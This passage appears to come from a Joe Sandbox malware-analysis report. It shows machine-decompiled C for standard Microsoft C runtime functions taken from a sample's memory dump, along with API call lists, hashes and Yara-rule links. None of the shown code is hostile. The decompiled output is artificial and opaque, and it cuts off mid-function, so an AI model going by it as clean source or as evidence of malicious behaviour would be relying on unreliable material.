				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00262CE0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00266F6B(_t69);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E002646B0(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E0026BFA0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















        0x00266e56
        0x00266e5d
        0x00266e69
        0x00266e6e
        0x00266e73
        0x00266e78
        0x00266e7b
        0x00266e7d
        0x00266e7d
        0x00266e82
        0x00266e9b
        0x00266ea1
        0x00266ea6
        0x00266f45
        0x00266f49
        0x00266f4e
        0x00266f4e
        0x00266f6a
        0x00266f6a
        0x00266eac
        0x00266eaf
        0x00266eb4
        0x00266eb8
        0x00266f04
        0x00266f06
        0x00266f08
        0x00266f0d
        0x00266f24
        0x00266f2c
        0x00266f3c
        0x00266f3c
        0x00266f2c
        0x00266f3e
        0x00266f3f
        0x00000000
        0x00266f44
        0x00266eba
        0x00266ebf
        0x00266ec1
        0x00266ec3
        0x00266ec3
        0x00266ecb
        0x00266ee8
        0x00266ef2
        0x00266ef7
        0x00000000
        0x00000000
        0x00266ef9
        0x00266eff
        0x00266eff
        0x00000000
        0x00266eff
        0x00266ecf
        0x00266ed3
        0x00266ed8
        0x00266edc
        0x00000000
        0x00000000
        0x00266ede
        0x00000000

        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,?,00000100,W\&,00000000,00000001,00000020,00000100,?,?,00000000), ref: 00266E9B
        • __alloca_probe_16.LIBCMT ref: 00266ED3
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00266F24
        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00266F36
        • __freea.LIBCMT ref: 00266F3F
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
        • String ID: W\&
        • API String ID: 1857427562-1387361922
        • Opcode ID: cca6bc33cd76bd1b9e7f245ecc5d17f5535ac08f3914a20ca6f2c1e96b13fb4a
        • Instruction ID: 39dcb7cd0fb2784a1cb8ab69a8150955550f694fa09c5ede622078be21596546
        • Opcode Fuzzy Hash: cca6bc33cd76bd1b9e7f245ecc5d17f5535ac08f3914a20ca6f2c1e96b13fb4a
        • Instruction Fuzzy Hash: 3131E132A2020AABDF259F65EC49DAE7BA5EF40310F054129FC05D6250EB35CDA5CBD0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00263E82 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00263E77,00000003,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002), ref: 00263EA2
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00263EB5
        • FreeLibrary.KERNEL32(00000000,?,?,?,00263E77,00000003,?,00263E17,00000003,00271DE8,0000000C,00263F2A,00000003,00000002,00000000), ref: 00263ED8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 1e3e832be9080082fd7db613749d6674b6eca1a80f2129bad3be4517cdc0da5c
        • Instruction ID: 0bed24f7fd3fb98934fe6d9236fb5bfe959acb8e98a2780c8860cf0cdd5d304f
        • Opcode Fuzzy Hash: 1e3e832be9080082fd7db613749d6674b6eca1a80f2129bad3be4517cdc0da5c
        • Instruction Fuzzy Hash: D7F04F30B1060DBBCB119F95EC0DB9EBFB9EF48711F014065F809A2190DB718A91DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00265D94 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
        Download Yara Rule
        C-Code - Quality: 93%
        			E00265D94() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00265D5D(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E002646B0(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00264676(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












        0x00265da3
        0x00265da9
        0x00265e01
        0x00265e01
        0x00265dab
        0x00265dac
        0x00265db1
        0x00265dba
        0x00265dc0
        0x00265dc6
        0x00265dcb
        0x00000000
        0x00265dcd
        0x00265dd3
        0x00265dd8
        0x00265df6
        0x00265df0
        0x00265df0
        0x00265df2
        0x00265df2
        0x00265df9
        0x00265dfe
        0x00265dcb
        0x00265e05
        0x00265e08
        0x00265e08
        0x00265e16

        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 00265D9D
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00265DC0
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00265DE6
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00265E08
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap
        • String ID:
        • API String ID: 1993637811-0
        • Opcode ID: 76ed4cde9dfe343071b43692a0c63a05511953a0282e956d668d2d38d5439fa8
        • Instruction ID: cc6247097d8f34e0be9506594a5a024d10720bd81d2b743ff46b18356e82f57b
        • Opcode Fuzzy Hash: 76ed4cde9dfe343071b43692a0c63a05511953a0282e956d668d2d38d5439fa8
        • Instruction Fuzzy Hash: 6601AC72A21A657F67211ABA6C8CC7F6D6DDFC7B607144129FD04C6240DEB18E6185F0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002662B8 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 95%
        			E002662B8(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x273e88 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x26dd68 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x16a1918a
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










        0x002662bd
        0x002662c1
        0x002662c8
        0x002662cc
        0x002662da
        0x002662f0
        0x002662f4
        0x0026631d
        0x0026631f
        0x00266323
        0x00266326
        0x00266326
        0x0026632c
        0x0026632e
        0x00000000
        0x0026632f
        0x002662f6
        0x002662ff
        0x0026630e
        0x00266301
        0x00266304
        0x0026630a
        0x0026630a
        0x00266312
        0x00000000
        0x00266314
        0x00266317
        0x00266319
        0x00000000
        0x00266319
        0x00266312
        0x002662ce
        0x002662d3
        0x00000000

        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0026625F,00000000,00000000,00000000,00000000,?,002664D0,00000006,FlsSetValue), ref: 002662EA
        • GetLastError.KERNEL32(?,0026625F,00000000,00000000,00000000,00000000,?,002664D0,00000006,FlsSetValue,0026E238,0026E240,00000000,00000364,?,00264D1C), ref: 002662F6
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0026625F,00000000,00000000,00000000,00000000,?,002664D0,00000006,FlsSetValue,0026E238,0026E240,00000000), ref: 00266304
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID:
        • API String ID: 3177248105-0
        • Opcode ID: 869576cca074a11acf64842192cdcd2ddaf645ba1259f048e3f81e6abcc04f6d
        • Instruction ID: 6232e0c0471b2493acab9d21eda24b251f48decafaf381deb73604ef5f051c5e
        • Opcode Fuzzy Hash: 869576cca074a11acf64842192cdcd2ddaf645ba1259f048e3f81e6abcc04f6d
        • Instruction Fuzzy Hash: 4801F736B21377ABC7215E78BC4CA567B58AF05FA0F204561F90AD3280C761D8B1C6E0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00264C4A Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 72%
        			E00264C4A(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x273044; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E0026479B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E002664A9(_t25, _t36, __eflags,  *0x273044, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00264ABC(_t25, _t31, 0x274164);
							E00264676(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00264676();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00264758(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x273044; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E0026479B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E002664A9(_t27, _t37, __eflags,  *0x273044, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00264ABC(_t27, _t32, 0x274164);
									E00264676(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00264676();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00266453(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00266453(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















        0x00264c4a
        0x00264c4a
        0x00264c4a
        0x00264c54
        0x00264c56
        0x00264c5b
        0x00264c5e
        0x00264c6c
        0x00264c73
        0x00264c78
        0x00264c7b
        0x00264c7e
        0x00264c90
        0x00264c95
        0x00264c97
        0x00264ca2
        0x00264ca9
        0x00264cae
        0x00264cb1
        0x00264cb3
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00264c99
        0x00264c99
        0x00000000
        0x00264c99
        0x00264c80
        0x00264c80
        0x00264c81
        0x00264c81
        0x00264c86
        0x00264cc1
        0x00264cc2
        0x00264cc8
        0x00264ccd
        0x00264cd0
        0x00264cd1
        0x00264cd2
        0x00264cd9
        0x00264cdb
        0x00264cdd
        0x00264ce2
        0x00264ce5
        0x00264cf3
        0x00264cff
        0x00264d02
        0x00264d05
        0x00264d17
        0x00264d1c
        0x00264d1e
        0x00264d29
        0x00264d2f
        0x00264d37
        0x00264d39
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00264d20
        0x00264d20
        0x00000000
        0x00264d20
        0x00264d07
        0x00264d07
        0x00264d08
        0x00264d08
        0x00264d3b
        0x00264d3c
        0x00264d3c
        0x00264ce7
        0x00264ced
        0x00264cf1
        0x00264d44
        0x00264d45
        0x00264d4b
        0x00000000
        0x00000000
        0x00000000
        0x00264cf1
        0x00264d52
        0x00264d52
        0x00264c60
        0x00264c66
        0x00264c6a
        0x00264cb5
        0x00264cb6
        0x00264cc0
        0x00000000
        0x00000000
        0x00000000
        0x00264c6a

        APIs
        • GetLastError.KERNEL32(?,?,0026464B,00271E70,0000000C,00262746), ref: 00264C4E
        • SetLastError.KERNEL32(00000000), ref: 00264CB6
        • SetLastError.KERNEL32(00000000), ref: 00264CC2
        • _abort.LIBCMT ref: 00264CC8
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ErrorLast$_abort
        • String ID:
        • API String ID: 88804580-0
        • Opcode ID: 82d340f4e564f17cc91e2c65371d745acc6dda8953eb7050a86b12bff6069027
        • Instruction ID: c0a1e4825a3a27ba85d700c26d5ebc424a388352a838c2e4fc84216bb02b81b8
        • Opcode Fuzzy Hash: 82d340f4e564f17cc91e2c65371d745acc6dda8953eb7050a86b12bff6069027
        • Instruction Fuzzy Hash: 92F028366316017AC6127B38BD0EF1B2A598FC2730F254115F89892392EF61CDF25860
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00262C96 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00262C96() {
				void* _t4;
				void* _t8;

				E00263315();
				E002632A9();
				if(E00263009() != 0) {
					_t4 = E00262FBB(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00263045();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





        0x00262c96
        0x00262c9b
        0x00262ca7
        0x00262cac
        0x00262cb1
        0x00262cb3
        0x00262cbe
        0x00262cb5
        0x00262cb5
        0x00000000
        0x00262cb5
        0x00262ca9
        0x00262ca9
        0x00262cab
        0x00262cab

        APIs
        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00262C96
        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00262C9B
        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00262CA0
          • Part of subcall function 00263009: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0026301A
        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00262CB5
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
        • String ID:
        • API String ID: 1761009282-0
        • Opcode ID: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction ID: b00f0dc759edb05f9e3cfb45e8f109a6409cea188fa363a7a031f599eb2c8058
        • Opcode Fuzzy Hash: b1b90c0d53e394bb07de617adf9d7015355adfa0c29a78e449e0bafd0537e884
        • Instruction Fuzzy Hash: 20C04818030A42E4AC60BBB12A131AD23100EA2786B9218C6EC5027593DE1B0BFE6D32
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00265725 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
        Download Yara Rule
        C-Code - Quality: 96%
        			E00265725(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x273018; // 0x16a19189
				_v8 = _t63 ^ _t102;
				_t2 =  &_a4; // 0x265c57
				_t101 =  *_t2;
				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
					_t96 = _t101 + 0x119;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t96 = _t101 + 0x119;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					E00266E4E(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
					E00268A70(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
					E00268A70(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E002629BB(_v8 ^ _t102);
			}































        0x00265725
        0x00265730
        0x00265737
        0x0026573c
        0x0026573c
        0x00265759
        0x00265851
        0x00265857
        0x00265859
        0x0026585a
        0x0026585a
        0x0026585c
        0x00265862
        0x00265862
        0x00265864
        0x00265866
        0x0026586f
        0x00265872
        0x0026587e
        0x00265885
        0x00265895
        0x00265887
        0x00265887
        0x0026588a
        0x0026588a
        0x0026588a
        0x0026588e
        0x0026588e
        0x00000000
        0x0026588e
        0x00265874
        0x00265874
        0x00265879
        0x00265879
        0x00265891
        0x00265891
        0x00265891
        0x00265897
        0x0026589d
        0x002658a3
        0x002658a4
        0x002658a4
        0x0026575f
        0x0026575f
        0x00265761
        0x00265761
        0x00265768
        0x00265769
        0x0026576d
        0x00265773
        0x00265779
        0x002657a1
        0x002657a1
        0x002657a3
        0x00000000
        0x00000000
        0x00265782
        0x00265786
        0x00265798
        0x00265798
        0x0026579a
        0x00000000
        0x00000000
        0x0026578b
        0x0026578d
        0x0026578f
        0x00265797
        0x00265797
        0x00000000
        0x00265797
        0x00000000
        0x0026578d
        0x0026579c
        0x0026579c
        0x0026579f
        0x0026579f
        0x002657bb
        0x002657dc
        0x00265804
        0x0026580c
        0x0026580e
        0x0026580e
        0x00265818
        0x00265828
        0x0026582a
        0x00265841
        0x0026582c
        0x0026582c
        0x0026582c
        0x0026582c
        0x00265831
        0x00000000
        0x00265831
        0x0026581a
        0x0026581a
        0x0026581f
        0x00265838
        0x00265838
        0x00265838
        0x00265848
        0x00265849
        0x0026584d
        0x002658b8

        APIs
        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0026574A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Info
        • String ID: $W\&
        • API String ID: 1807457897-2235781088
        • Opcode ID: b7c4f52ae674a20d6a2b737af35fbe9d94f9b69e5ec37e8d236280ebd1dc815a
        • Instruction ID: af64aec6933f7bf4dcacf6cd2847c49bc8f82f8f3bd770fac1e6fd6c12ed95f6
        • Opcode Fuzzy Hash: b7c4f52ae674a20d6a2b737af35fbe9d94f9b69e5ec37e8d236280ebd1dc815a
        • Instruction Fuzzy Hash: 37411A705147A89BDB228E64CC84BFABBADEB45308F1404EDE58A87142D2359AD5DF60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00267008 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 100%
        			E00267008(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x273648) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00264676(_t46);
							E00266BC7( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00264676(_t47);
							E00266CC5( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00264676( *((intOrPtr*)(_t74 + 0x7c)));
						E00264676( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00264676( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00264676( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00264676( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00264676( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0026717B( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
